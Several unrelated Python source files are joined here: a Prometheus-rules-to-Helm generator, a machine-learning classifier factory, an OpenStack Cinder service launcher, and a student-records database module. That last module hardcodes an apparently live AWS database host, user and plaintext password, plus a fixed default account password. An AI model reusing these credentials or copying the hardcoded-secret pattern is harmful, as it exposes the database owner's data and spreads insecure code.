if replacement_map[line]['init']:
init_line += '\n' + replacement_map[line]['init']
# append per-alert rules
rules = add_rules_conditions(rules)
# initialize header
lines = header % {
'name': group['name'],
'url': url,
'condition': condition_map.get(group['name'], ''),
'init_line': init_line,
'min_kubernetes': min_kubernetes,
'max_kubernetes': max_kubernetes
}
# rules themselves
lines += rules
# footer
lines += '{{- end }}'
filename = group['name'] + '.yaml'
new_filename = "%s/%s" % (destination, filename)
# make sure directories to store the file exist
makedirs(destination, exist_ok=True)
# recreate the file
with open(new_filename, 'w') as f:
f.write(lines)
print("Generated %s" % new_filename)
def main():
init_yaml_styles()
# read the rules, create a new template file per group
for chart in charts:
print("Generating rules from %s" % chart['source'])
response = requests.get(chart['source'])
if response.status_code != 200:
print('Skipping the file, response code %s not equals 200' % response.status_code)
continue
raw_text = response.text
yaml_text = yaml.full_load(raw_text)
if ('max_kubernetes' not in chart):
chart['max_kubernetes']="9.9.9-9"
# etcd workaround, their file don't have spec level
groups = yaml_text['spec']['groups'] if yaml_text.get('spec') else yaml_text['groups']
for group in groups:
write_group_to_file(group, chart['source'], chart['destination'], chart['min_kubernetes'], chart['max_kubernetes'])
print("Finished")
if __name__ == '__main__':
main()
|
|
"""
**Factory** provides convenient way to train several classifiers on the same dataset.
These classifiers can be trained one-by-one in a single thread, or simultaneously
with IPython cluster or in several threads.
Also `Factory` allows comparison of several classifiers (predictions of which can be used in parallel).
"""
from __future__ import division, print_function, absolute_import
from abc import ABCMeta, abstractmethod
from collections import OrderedDict
import time
from sklearn.base import BaseEstimator, RegressorMixin, ClassifierMixin
from ..report import classification, regression
from ..estimators.interface import Classifier, Regressor
from ..estimators.sklearn import SklearnClassifier, SklearnRegressor
from . import utils
__author__ = 'Tatiana Likhomanenko'
class AbstractFactory(OrderedDict):
"""
Factory provides interface to train simultaneously several estimators (classifiers or regressors).
Later their quality can be compared.
.. Note: don't use this class, but it's ancestors.
"""
__metaclass__ = ABCMeta
def fit(self, X, y, sample_weight=None, parallel_profile=None, features=None):
"""
Train all estimators on the same data.
:param X: pandas.DataFrame of shape [n_samples, n_features] with features
:param y: array-like of shape [n_samples] with labels of samples
:param sample_weight: weights of events,
array-like of shape [n_samples] or None if all weights are equal
:param features: features to train estimators
If None, estimators will be trained on `estimator.features`
:type features: None or list[str]
:param parallel_profile: profile of parallel execution system or None
:type parallel_profile: None or str
:return: self
"""
if features is not None:
for name, estimator in self.items():
if estimator.features is not None:
print('Overwriting features of estimator ' + name)
self[name].set_params(features=features)
start_time = time.time()
result = utils.map_on_cluster(parallel_profile, train_estimator, list(self.keys()), list(self.values()),
[X] * len(self), [y] * len(self), [sample_weight] * len(self))
for status, data in result:
if status == 'success':
name, estimator, spent_time = data
self[name] = estimator
print('model {:12} was trained in {:.2f} seconds'.format(name, spent_time))
else:
print('Problem while training on the node, report:\n', data)
print("Totally spent {:.2f} seconds on training".format(time.time() - start_time))
return self
def fit_lds(self, lds, parallel_profile=None, features=None):
"""
Fit all estimators on the same dataset.
:param LabeledDataStorage lds: dataset
:param features: features to train estimators
If None, estimators will be trained on `estimator.features`
:param parallel_profile: profile of parallel execution system or None
:type parallel_profile: None or str
:return: self
"""
X, y, sample_weight = lds.get_data(features), lds.get_targets(), lds.get_weights()
return self.fit(X, y, sample_weight=sample_weight, parallel_profile=parallel_profile, features=features)
@abstractmethod
def predict(self, X, parallel_profile=None):
"""
Predict labels (or values for regressors) for all events in dataset.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param parallel_profile: profile of parallel execution system or None
:type parallel_profile: None or str
:rtype: OrderedDict[numpy.array of shape [n_samples] with integer labels (or values)]
"""
pass
@abstractmethod
def test_on_lds(self, lds):
"""
Prepare report for factory (comparison of all models).
:param LabeledDataStorage lds: data
:rtype: rep.report.classification.ClassificationReport or rep.report.regression.RegressionReport
"""
pass
def test_on(self, X, y, sample_weight=None):
"""
Prepare report for factory (comparison of all models).
:param X: pandas.DataFrame of shape [n_samples, n_features] with features
:param y: numpy.array of shape [n_samples] with targets
:param sample_weight: weight of events,
array-like of shape [n_samples] or None if all weights are equal
:rtype: rep.report.classification.ClassificationReport or rep.report.regression.RegressionReport
"""
from ..data import LabeledDataStorage
return self.test_on_lds(LabeledDataStorage(X, target=y, sample_weight=sample_weight))
class ClassifiersFactory(AbstractFactory):
"""
Factory provides training of several classifiers in parallel.
Quality of trained classifiers can be compared.
"""
def add_classifier(self, name, classifier):
"""
Add classifier to factory.
Automatically wraps classifier with :class:`SklearnClassifier`
:param str name: unique name for classifier.
If name coincides with one already used, the old classifier will be replaced by one passed.
:param classifier: classifier object
.. note:: if type == sklearn.base.BaseEstimator, then features=None is used,
to specify features used by classifier, wrap it with `SklearnClassifier`
:type classifier: sklearn.base.BaseEstimator or estimators.interface.Classifier
"""
if isinstance(classifier, Classifier):
self[name] = classifier
elif isinstance(classifier, BaseEstimator) and isinstance(classifier, ClassifierMixin):
self[name] = SklearnClassifier(classifier)
else:
raise NotImplementedError(
'Supports only instances of sklearn.base.BaseEstimator or rep.estimators.interface.Classifier')
def predict(self, X, parallel_profile=None):
"""
Predict labels for all events in dataset.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param parallel_profile: profile for IPython cluster
:type parallel_profile: None or str
:rtype: OrderedDict[numpy.array of shape [n_samples] with integer labels]
"""
return self._predict_method(X, parallel_profile=parallel_profile, prediction_type='classification')
def predict_proba(self, X, parallel_profile=None):
"""
Predict probabilities for all events in dataset.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param parallel_profile: profile
:type parallel_profile: None or str
:rtype: OrderedDict[numpy.array of shape [n_samples] with float predictions]
"""
return self._predict_method(X, parallel_profile=parallel_profile, prediction_type='classification-proba')
def _predict_method(self, X, parallel_profile=None, prediction_type='classification'):
"""
Predict probabilities for all events in dataset.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param parallel_profile: profile
:type parallel_profile: None or str
:param str prediction_type: 'classification' or 'regression' or 'classification-proba'
:rtype: OrderedDict[numpy.array of shape [n_samples] with float predictions]
"""
predictions = OrderedDict()
start_time = time.time()
result = utils.map_on_cluster(parallel_profile, predict_estimator, list(self.keys()), list(self.values()), [X] * len(self),
[prediction_type] * len(self))
for status, data in result:
if status == 'success':
name, prob, spent_time = data
predictions[name] = prob
print('data was predicted by {:12} in {:.2f} seconds'.format(name, spent_time))
else:
print('Problem while predicting on the node, report:\n', data)
print("Totally spent {:.2f} seconds on prediction".format(time.time() - start_time))
return predictions
def staged_predict_proba(self, X):
"""
Predict probabilities on each stage (attention: returns dictionary of generators)
:param X: pandas.DataFrame of shape [n_samples, n_features]
:rtype: dict[iterator]
"""
generators_dict = OrderedDict()
for name, classifier in self.items():
try:
generators_dict[name] = classifier.staged_predict_proba(X)
except AttributeError:
pass
return generators_dict
def test_on_lds(self, lds):
"""
Prepare report for factory of estimators
:param LabeledDataStorage lds: data
:rtype: rep.report.classification.ClassificationReport
"""
return classification.ClassificationReport(self, lds)
class RegressorsFactory(AbstractFactory):
"""
Factory provides training of several classifiers in parallel.
Quality of trained regressors can be compared.
"""
def add_regressor(self, name, regressor):
"""
Add regressor to factory
:param str name: unique name for regressor.
If name coincides with one already used, the old regressor will be replaced by one passed.
:param regressor: regressor object
.. note:: if type == sklearn.base.BaseEstimator, then features=None is used
:type regressor: sklearn.base.BaseEstimator or estimators.interface.Regressor
"""
if isinstance(regressor, Regressor):
self[name] = regressor
elif isinstance(regressor, BaseEstimator) and isinstance(regressor, RegressorMixin):
self[name] = SklearnRegressor(regressor)
else:
raise NotImplementedError(
'Supports only instances of sklearn.base.BaseEstimator or rep.estimators.interface.Regressor')
def predict(self, X, parallel_profile=None):
"""
Predict values for all events in dataset.
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param parallel_profile: profile
:type parallel_profile: None or name of profile to parallelize computations.
:rtype: OrderedDict[numpy.array of shape [n_samples] with float values]
"""
predictions = OrderedDict()
start_time = time.time()
result = utils.map_on_cluster(parallel_profile, predict_estimator, list(self.keys()), list(self.values()), [X] * len(self),
['regression'] * len(self))
for status, data in result:
if status == 'success':
name, values, spent_time = data
predictions[name] = values
print('data was predicted by {:12} in {:.2f} seconds'.format(name, spent_time))
else:
print('Problem while predicting on the node, report:\n', data)
print("Totally spent {:.2f} seconds on prediction".format(time.time() - start_time))
return predictions
def staged_predict(self, X):
"""
Predicts probabilities on each stage
:param X: pandas.DataFrame of shape [n_samples, n_features]
:rtype: dict[iterator]
"""
generators_dict = OrderedDict()
for name, regressor in self.items():
try:
generators_dict[name] = regressor.staged_predict(X)
except AttributeError:
pass
return generators_dict
def test_on_lds(self, lds):
"""
Report for factory of estimators
:param LabeledDataStorage lds: data
:rtype: rep.report.regression.RegressionReport
"""
return regression.RegressionReport(self, lds)
def train_estimator(name, estimator, X, y, sample_weight=None):
"""
Supplementary function.
Trains estimator on a separate node (or in a separate thread)
:param str name: classifier name
:param estimator: estimator
:type estimator: Classifier or Regressor
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param y: labels of events - array-like of shape [n_samples]
:param sample_weight: weight of events,
array-like of shape [n_samples] or None if all weights are equal
:return: ('success', (name (str), estimator (Classifier or Regressor), time (int) )) or
('fail', (name (str), pid (int), socket (int), error (Exception) ))
"""
try:
start = time.time()
if sample_weight is None:
estimator.fit(X, y)
else:
estimator.fit(X, y, sample_weight=sample_weight)
return 'success', (name, estimator, time.time() - start)
except Exception as e:
import socket
import os
pid = os.getpid()
hostname = socket.gethostname()
return 'fail', (name, pid, hostname, e)
def predict_estimator(name, estimator, X, prediction_type='classification'):
"""
Supplementary function.
Builds predictions for one estimator on a separate node (or in a separate thread)
:param str name: classifier name
:param estimator: estimator
:type estimator: Classifier or Regressor
:param X: pandas.DataFrame of shape [n_samples, n_features]
:param str prediction_type: 'classification' or 'regression' or 'classification-proba'
:return: ('success', (name (str), probabilities (numpy.array), time (int) )) or
('fail', (name (str), pid (int), socket (int), error (Exception) ))
"""
try:
start = time.time()
if prediction_type == 'classification':
prediction = estimator.predict(X)
elif prediction_type == 'classification-proba':
prediction = estimator.predict_proba(X)
elif prediction_type == 'regression':
prediction = estimator.predict(X)
else:
raise NotImplementedError("Unknown problem type: {}".format(prediction_type))
return 'success', (name, prediction, time.time() - start)
except Exception as e:
import socket
import os
pid = os.getpid()
hostname = socket.gethostname()
return 'fail', (name, pid, hostname, e)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic Node base class for all workers that run on hosts."""
import inspect
import os
import random
import signal
import eventlet
import greenlet
from cinder import context
from cinder import db
from cinder import exception
from cinder import flags
from cinder.openstack.common import cfg
from cinder.openstack.common import importutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import rpc
from cinder import utils
from cinder import version
from cinder import wsgi
LOG = logging.getLogger(__name__)
service_opts = [
cfg.IntOpt('report_interval',
default=10,
help='seconds between nodes reporting state to datastore'),
cfg.IntOpt('periodic_interval',
default=60,
help='seconds between running periodic tasks'),
cfg.IntOpt('periodic_fuzzy_delay',
default=60,
help='range of seconds to randomly delay when starting the'
' periodic task scheduler to reduce stampeding.'
' (Disable by setting to 0)'),
cfg.StrOpt('osapi_volume_listen',
default="0.0.0.0",
help='IP address for OpenStack Volume API to listen'),
cfg.IntOpt('osapi_volume_listen_port',
default=8776,
help='port for os volume api to listen'), ]
FLAGS = flags.FLAGS
FLAGS.register_opts(service_opts)
class Launcher(object):
"""Launch one or more services and wait for them to complete."""
def __init__(self):
"""Initialize the service launcher.
:returns: None
"""
self._services = []
@staticmethod
def run_server(server):
"""Start and wait for a server to finish.
:param service: Server to run and wait for.
:returns: None
"""
server.start()
server.wait()
def launch_server(self, server):
"""Load and start the given server.
:param server: The server you would like to start.
:returns: None
"""
gt = eventlet.spawn(self.run_server, server)
self._services.append(gt)
def stop(self):
"""Stop all services which are currently running.
:returns: None
"""
for service in self._services:
service.kill()
def wait(self):
"""Waits until all services have been stopped, and then returns.
:returns: None
"""
def sigterm(sig, frame):
LOG.audit(_("SIGTERM received"))
# NOTE(jk0): Raise a ^C which is caught by the caller and cleanly
# shuts down the service. This does not yet handle eventlet
# threads.
raise KeyboardInterrupt
signal.signal(signal.SIGTERM, sigterm)
for service in self._services:
try:
service.wait()
except greenlet.GreenletExit:
pass
class Service(object):
"""Service object for binaries running on hosts.
A service takes a manager and enables rpc by listening to queues based
on topic. It also periodically runs tasks on the manager and reports
it state to the database services table."""
def __init__(self, host, binary, topic, manager, report_interval=None,
periodic_interval=None, periodic_fuzzy_delay=None,
*args, **kwargs):
self.host = host
self.binary = binary
self.topic = topic
self.manager_class_name = manager
manager_class = importutils.import_class(self.manager_class_name)
self.manager = manager_class(host=self.host, *args, **kwargs)
self.report_interval = report_interval
self.periodic_interval = periodic_interval
self.periodic_fuzzy_delay = periodic_fuzzy_delay
super(Service, self).__init__(*args, **kwargs)
self.saved_args, self.saved_kwargs = args, kwargs
self.timers = []
def start(self):
vcs_string = version.version_string_with_vcs()
LOG.audit(_('Starting %(topic)s node (version %(vcs_string)s)'),
{'topic': self.topic, 'vcs_string': vcs_string})
self.manager.init_host()
self.model_disconnected = False
ctxt = context.get_admin_context()
try:
service_ref = db.service_get_by_args(ctxt,
self.host,
self.binary)
self.service_id = service_ref['id']
except exception.NotFound:
self._create_service_ref(ctxt)
self.conn = rpc.create_connection(new=True)
LOG.debug(_("Creating Consumer connection for Service %s") %
self.topic)
rpc_dispatcher = self.manager.create_rpc_dispatcher()
# Share this same connection for these Consumers
self.conn.create_consumer(self.topic, rpc_dispatcher, fanout=False)
node_topic = '%s.%s' % (self.topic, self.host)
self.conn.create_consumer(node_topic, rpc_dispatcher, fanout=False)
self.conn.create_consumer(self.topic, rpc_dispatcher, fanout=True)
# Consume from all consumers in a thread
self.conn.consume_in_thread()
if self.report_interval:
pulse = utils.LoopingCall(self.report_state)
pulse.start(interval=self.report_interval,
initial_delay=self.report_interval)
self.timers.append(pulse)
if self.periodic_interval:
if self.periodic_fuzzy_delay:
initial_delay = random.randint(0, self.periodic_fuzzy_delay)
else:
initial_delay = None
periodic = utils.LoopingCall(self.periodic_tasks)
periodic.start(interval=self.periodic_interval,
initial_delay=initial_delay)
self.timers.append(periodic)
def _create_service_ref(self, context):
zone = FLAGS.storage_availability_zone
service_ref = db.service_create(context,
{'host': self.host,
'binary': self.binary,
'topic': self.topic,
'report_count': 0,
'availability_zone': zone})
self.service_id = service_ref['id']
def __getattr__(self, key):
manager = self.__dict__.get('manager', None)
return getattr(manager, key)
@classmethod
def create(cls, host=None, binary=None, topic=None, manager=None,
report_interval=None, periodic_interval=None,
periodic_fuzzy_delay=None):
"""Instantiates class and passes back application object.
:param host: defaults to FLAGS.host
:param binary: defaults to basename of executable
:param topic: defaults to bin_name - 'cinder-' part
:param manager: defaults to FLAGS.<topic>_manager
:param report_interval: defaults to FLAGS.report_interval
:param periodic_interval: defaults to FLAGS.periodic_interval
:param periodic_fuzzy_delay: defaults to FLAGS.periodic_fuzzy_delay
"""
if not host:
host = FLAGS.host
if not binary:
binary = os.path.basename(inspect.stack()[-1][1])
if not topic:
topic = binary
if not manager:
subtopic = topic.rpartition('cinder-')[2]
manager = FLAGS.get('%s_manager' % subtopic, None)
if report_interval is None:
report_interval = FLAGS.report_interval
if periodic_interval is None:
periodic_interval = FLAGS.periodic_interval
if periodic_fuzzy_delay is None:
periodic_fuzzy_delay = FLAGS.periodic_fuzzy_delay
service_obj = cls(host, binary, topic, manager,
report_interval=report_interval,
periodic_interval=periodic_interval,
periodic_fuzzy_delay=periodic_fuzzy_delay)
return service_obj
def kill(self):
"""Destroy the service object in the datastore."""
self.stop()
try:
db.service_destroy(context.get_admin_context(), self.service_id)
except exception.NotFound:
LOG.warn(_('Service killed that has no database entry'))
def stop(self):
# Try to shut the connection down, but if we get any sort of
# errors, go ahead and ignore them.. as we're shutting down anyway
try:
self.conn.close()
except Exception:
pass
for x in self.timers:
try:
x.stop()
except Exception:
pass
self.timers = []
def wait(self):
for x in self.timers:
try:
x.wait()
except Exception:
pass
def periodic_tasks(self, raise_on_error=False):
"""Tasks to be run at a periodic interval."""
ctxt = context.get_admin_context()
self.manager.periodic_tasks(ctxt, raise_on_error=raise_on_error)
def report_state(self):
"""Update the state of this service in the datastore."""
ctxt = context.get_admin_context()
zone = FLAGS.storage_availability_zone
state_catalog = {}
try:
try:
service_ref = db.service_get(ctxt, self.service_id)
except exception.NotFound:
LOG.debug(_('The service database object disappeared, '
'Recreating it.'))
self._create_service_ref(ctxt)
service_ref = db.service_get(ctxt, self.service_id)
state_catalog['report_count'] = service_ref['report_count'] + 1
if zone != service_ref['availability_zone']:
state_catalog['availability_zone'] = zone
db.service_update(ctxt,
self.service_id, state_catalog)
# TODO(termie): make this pattern be more elegant.
if getattr(self, 'model_disconnected', False):
self.model_disconnected = False
LOG.error(_('Recovered model server connection!'))
# TODO(vish): this should probably only catch connection errors
except Exception: # pylint: disable=W0702
if not getattr(self, 'model_disconnected', False):
self.model_disconnected = True
LOG.exception(_('model server went away'))
class WSGIService(object):
"""Provides ability to launch API from a 'paste' configuration."""
def __init__(self, name, loader=None):
"""Initialize, but do not start the WSGI server.
:param name: The name of the WSGI server given to the loader.
:param loader: Loads the WSGI application using the given name.
:returns: None
"""
self.name = name
self.manager = self._get_manager()
self.loader = loader or wsgi.Loader()
self.app = self.loader.load_app(name)
self.host = getattr(FLAGS, '%s_listen' % name, "0.0.0.0")
self.port = getattr(FLAGS, '%s_listen_port' % name, 0)
self.server = wsgi.Server(name,
self.app,
host=self.host,
port=self.port)
def _get_manager(self):
"""Initialize a Manager object appropriate for this service.
Use the service name to look up a Manager subclass from the
configuration and initialize an instance. If no class name
is configured, just return None.
:returns: a Manager instance, or None.
"""
fl = '%s_manager' % self.name
if fl not in FLAGS:
return None
manager_class_name = FLAGS.get(fl, None)
if not manager_class_name:
return None
manager_class = importutils.import_class(manager_class_name)
return manager_class()
def start(self):
"""Start serving this service using loaded configuration.
Also, retrieve updated port number in case '0' was passed in, which
indicates a random port should be used.
:returns: None
"""
if self.manager:
self.manager.init_host()
self.server.start()
self.port = self.server.port
def stop(self):
"""Stop serving this API.
:returns: None
"""
self.server.stop()
def wait(self):
"""Wait for the service to stop serving this API.
:returns: None
"""
self.server.wait()
# NOTE(vish): the global launcher is to maintain the existing
# functionality of calling service.serve +
# service.wait
_launcher = None
def serve(*servers):
global _launcher
if not _launcher:
_launcher = Launcher()
for server in servers:
_launcher.launch_server(server)
def wait():
LOG.debug(_('Full set of FLAGS:'))
for flag in FLAGS:
flag_get = FLAGS.get(flag, None)
# hide flag contents from log if contains a password
# should use secret flag when switch over to openstack-common
if ("_password" in flag or "_key" in flag or
(flag == "sql_connection" and "mysql:" in flag_get)):
LOG.debug(_('%(flag)s : FLAG SET ') % locals())
else:
LOG.debug('%(flag)s : %(flag_get)s' % locals())
try:
_launcher.wait()
except KeyboardInterrupt:
_launcher.stop()
rpc.cleanup()
|
|
import bcrypt
import psycopg2
import psycopg2.extras
##Database Exceptional Class##
class invalidQueryException(Exception): pass
##Basic Connection Class for Database##
class database:
def __init__(self):
self.__HOST = "myawsdatabase.c7mfxxgrjakk.ap-southeast-1.rds.amazonaws.com"
#self.__HOST = "localhost" ##**For Local Database**##
self.__DATABASE = "crazypetData"
self.__DBUSER = "app"
self.__DBPASS = "2rG3RSfTZ1"
try:
##Opening Database Connection##
self.connection = psycopg2.connect(host=self.__HOST,database=self.__DATABASE, user=self.__DBUSER, password=self.__DBPASS)
self.query = self.connection.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)
##Cannot Connect to Database##
except psycopg2.OperationalError:
raise invalidQueryException("Database Connection Error!")
def disconnect(self):
self.connection.close()
##Database Class for Login-Related Functions##
class databaseLogin(database):
##Basic Login use to Login User##
def userLogin(self, username, password):
password = bytes(password, encoding="ascii")
SQL = "SELECT password, user_id, user_type, username, status FROM \"GMan\".user_login WHERE username = %s"
DATA = (username,)
self.query.execute(SQL,DATA)
resultset = self.query.fetchone()
if(resultset == None):
raise invalidQueryException("Either Username or Password is Incorrect")
hashed = bytes(resultset.password, encoding="ascii")
if (bcrypt.hashpw(password, hashed) == hashed):
return True, resultset.user_id, resultset.user_type , resultset.username, resultset.status
else:
raise invalidQueryException("Either Username or Password is Incorrect")
##Create New Login for new Users##
def createLogin(self,userid,username,email,password = "DEFAULTPASS123456",userStatus= 0, userType = 0):
passwd_enc = bytes(password,encoding ="ascii")
passwd_hashed = bcrypt.hashpw(passwd_enc, bcrypt.gensalt(14))
passwd_hashed_dec = passwd_hashed.decode(encoding = "ascii")
SQL = "INSERT INTO \"GMan\".user_login(user_id, username, password, email, status, user_type)VALUES(%s,%s,%s,%s,%s,%s)"
DATA = (userid, username, passwd_hashed_dec, email, str(userStatus), str(userType))
try:
self.query.execute(SQL, DATA)
self.connection.commit()
SQL = "INSERT INTO \"GMan\".address (user_id, \"houseNumber\", street, \"subDistrict\", district, province, \"zipCode\") VALUES(%s, 'PLEASE UPDATE DATA', ' ', ' ', ' ', ' ', ' ')"
DATA = (userid,)
self.query.execute(SQL, DATA)
self.connection.commit()
return (1,1)
except psycopg2.IntegrityError as e:
return ("EXISTS",0)
##Edit Login Data##
def editLogin(self, username, email, userStatus=0):
SQL = "UPDATE \"GMan\".user_login SET email=%s,status=%s WHERE username=%s"
DATA = (email, str(userStatus),username)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
##Edit Login Password##
def changePassword(self, username, oldPassword, newPassword):
password = bytes(oldPassword, encoding="ascii")
SQL = "SELECT password FROM \"GMan\".user_login WHERE username = %s"
DATA = (username,)
self.query.execute(SQL,DATA)
resultset = self.query.fetchone()
if(resultset == None):
raise invalidQueryException("Either Username or Password is Incorrect")
hashed = bytes(resultset.password, encoding="ascii")
if (bcrypt.hashpw(password, hashed) == hashed):
passwd_enc = bytes(newPassword,encoding ="ascii")
passwd_hashed = bcrypt.hashpw(passwd_enc, bcrypt.gensalt(14))
passwd_hashed_dec = passwd_hashed.decode(encoding = "ascii")
SQL = "UPDATE \"GMan\".user_login SET password=%s WHERE username = %s"
DATA = (passwd_hashed_dec,username)
self.query.execute(SQL, DATA)
self.connection.commit()
else:
raise invalidQueryException("Either Username or Password is Incorrect")
##Reset User Password##
def resetPassword(self, user_id, username, email, new_pw):
passwd_enc = bytes(new_pw, encoding="ascii")
passwd_hashed = bcrypt.hashpw(passwd_enc, bcrypt.gensalt(14))
passwd_hashed_dec = passwd_hashed.decode(encoding="ascii")
SQL = "UPDATE \"GMan\".user_login SET password=%s WHERE username = %s AND user_id = %s AND email = %s"
DATA = (passwd_hashed_dec, username, user_id, email)
self.query.execute(SQL, DATA)
self.connection.commit()
##Block and Un-Block Users##
def blockUser(self, command, status, userid):
if (command == "BLOCK" and status == 0):
SQL = "UPDATE \"GMan\".user_login SET status=1 WHERE user_id=%s"
DATA = (userid,)
self.query.execute(SQL, DATA)
self.connection.commit()
SQL = "UPDATE \"GMan\".student SET status=6 WHERE user_id=%s"
if (command == "BLOCK" and status == 1):
SQL = "UPDATE \"GMan\".user_login SET status=1 WHERE user_id=%s"
DATA = (userid,)
self.query.execute(SQL, DATA)
self.connection.commit()
SQL = "UPDATE \"GMan\".professor SET status=6 WHERE user_id=%s"
if (command == "UNBLOCK" and status == 0):
SQL = "UPDATE \"GMan\".user_login SET status=0 WHERE user_id=%s"
DATA = (userid,)
self.query.execute(SQL, DATA)
self.connection.commit()
SQL = "UPDATE \"GMan\".student SET status=0 WHERE user_id=%s"
if (command == "UNBLOCK" and status == 1):
SQL = "UPDATE \"GMan\".user_login SET status=0 WHERE user_id=%s"
DATA = (userid,)
self.query.execute(SQL, DATA)
self.connection.commit()
SQL = "UPDATE \"GMan\".professor SET status=0 WHERE user_id=%s"
DATA = (userid,)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
##Suspend and Un-Suspend Users##
def suspendUser(self, command, type, userid):
if(command == "SUSP" and type == "STUDENT"):
SQL = "UPDATE \"GMan\".student SET status=4 WHERE user_id=%s"
if (command == "SUSP" and type == "PROFESSOR"):
SQL = "UPDATE \"GMan\".professor SET status=4 WHERE user_id=%s"
if (command == "UNSUSP" and type == "STUDENT"):
SQL = "UPDATE \"GMan\".student SET status=0 WHERE user_id=%s"
if (command == "UNSUSP" and type == "PROFESSOR"):
SQL = "UPDATE \"GMan\".professor SET status=0 WHERE user_id=%s"
DATA = (userid,)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
##Retire Users##
def retireUser(self, type, userid):
if(type == "STUDENT"):
SQL = "UPDATE \"GMan\".student SET status=5 WHERE user_id=%s"
if (type == "PROFESSOR"):
SQL = "UPDATE \"GMan\".professor SET status=5 WHERE user_id=%s"
DATA = (userid,)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
##Delete Login Data##
def deleteLogin(self,userid,username):
SQL = "DELETE FROM \"GMan\".user_login WHERE user_id=%s AND username =%s";
DATA = (userid, username)
self.query.execute(SQL, DATA)
self.connection.commit()
##Get User Information##
def getInformationUser(self, userid):
SQL = "SELECT user_type, username, user_id FROM \"GMan\".user_login WHERE user_id = %s"
DATA = (userid,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
if(resultset is not None):
if(resultset.user_type == 0):
SQL = "SELECT * FROM \"GMan\".student WHERE user_id = %s"
DATA = (userid,)
self.query.execute(SQL, DATA)
resultsetData = self.query.fetchone()
if (resultset.user_type == 1):
SQL = "SELECT * FROM \"GMan\".professor WHERE user_id = %s"
DATA = (userid,)
self.query.execute(SQL, DATA)
resultsetData = self.query.fetchone()
if (resultset.user_type == 2):
SQL = "SELECT * FROM \"GMan\".admin WHERE user_id = %s"
DATA = (userid,)
self.query.execute(SQL, DATA)
resultsetData = self.query.fetchone()
return (resultset,resultsetData, resultset.user_type)
return(None, None,None)
##Database Class for User-Related Functions##
class databaseUser(database):
##Get User Information##
def getInfo(self, inp_data):
if(inp_data[2] == 0):
SQL = "SELECT * FROM \"GMan\".student WHERE user_id =%s"
DATA = (inp_data[1],)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset
if (inp_data[2] == 1):
SQL = "SELECT * FROM \"GMan\".professor WHERE user_id =%s"
DATA = (inp_data[1],)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset
if (inp_data[2] == 2):
SQL = "SELECT * FROM \"GMan\".admin WHERE user_id =%s"
DATA = (inp_data[1],)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset
##Get User Address##
def getAddress(self, inp_data):
SQL = "SELECT * FROM \"GMan\".address WHERE user_id =%s"
DATA = (inp_data[1],)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset
##Get Faculty Information##
def getFaculty(self, inp_data):
SQL = "SELECT * FROM \"GMan\".faculty WHERE \"facultyID\" =%s"
DATA = (inp_data,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset
##Get Major Information##
def getMajor(self, inp_data):
SQL = "SELECT * FROM \"GMan\".majors WHERE \"majorID\" =%s"
DATA = (inp_data,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset
##Update User Address##
def updateAddress(self, user_id, homeNum, street, sDistrict, district, province, zip):
SQL = "UPDATE \"GMan\".address SET \"houseNumber\"=%s, street=%s, \"subDistrict\"=%s, district=%s, province=%s, \"zipCode\"=%s WHERE user_id=%s"
DATA = (homeNum, street, sDistrict, district, province, zip, user_id)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
##Update User Profile Picture as blobs##
def editProfilePicture(self, blob, user_id):
SQL = "UPDATE \"GMan\".user_login SET picture=%s WHERE user_id=%s"
DATA = (blob, user_id)
self.query.execute(SQL, DATA)
self.connection.commit()
return 1
##Get User Profile Picture##
def getProfilePicture(self, user_id):
SQL = "SELECT picture FROM \"GMan\".user_login WHERE user_id =%s"
DATA = (user_id,)
self.query.execute(SQL, DATA)
resultset = self.query.fetchone()
return resultset, 1
##Create New User Student##
def createStudent(self, userid, name, surname, email, faculty, major):
SQL = "SELECT term FROM \"GMan\".student"
self.query.execute(SQL)
resultset = self.query.fetchone()
term = resultset.term
try:
SQL = "INSERT INTO \"GMan\".student (user_id, \"name\", surname, email, \"year\", status, gpa, \"facultyID\", \"majorID\", term) \
VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
DATA = (userid, name, surname, email, 1, 0, 0.00, faculty, major, int(term))
print(DATA)
self.query.execute(SQL, DATA)
self.connection.commit()
return (1,1)
except psycopg2.IntegrityError as e:
print(e.pgcode, e.pgerror)
return (str(e.pgcode), e.pgerror)
except psycopg2.DataError as e:
print(e.pgcode, e.pgerror)
return (str(e.pgcode), e.pgerror)
##Create New User Professor##
def createProfessor(self, userid, name, surname, email, facultyID):
try:
SQL = "INSERT INTO \"GMan\".professor (user_id, \"name\", surname, email, \"position\", status, \"facultyID\")\
VALUES(%s, %s,%s, %s, %s,%s, %s)"
DATA = (userid, name, surname, email, 0, 0, facultyID)
self.query.execute(SQL, DATA)
self.connection.commit()
return (1,1)
except psycopg2.IntegrityError as e:
print(e.pgcode, e.pgerror)
return (str(e.pgcode), e.pgerror)
except psycopg2.DataError as e:
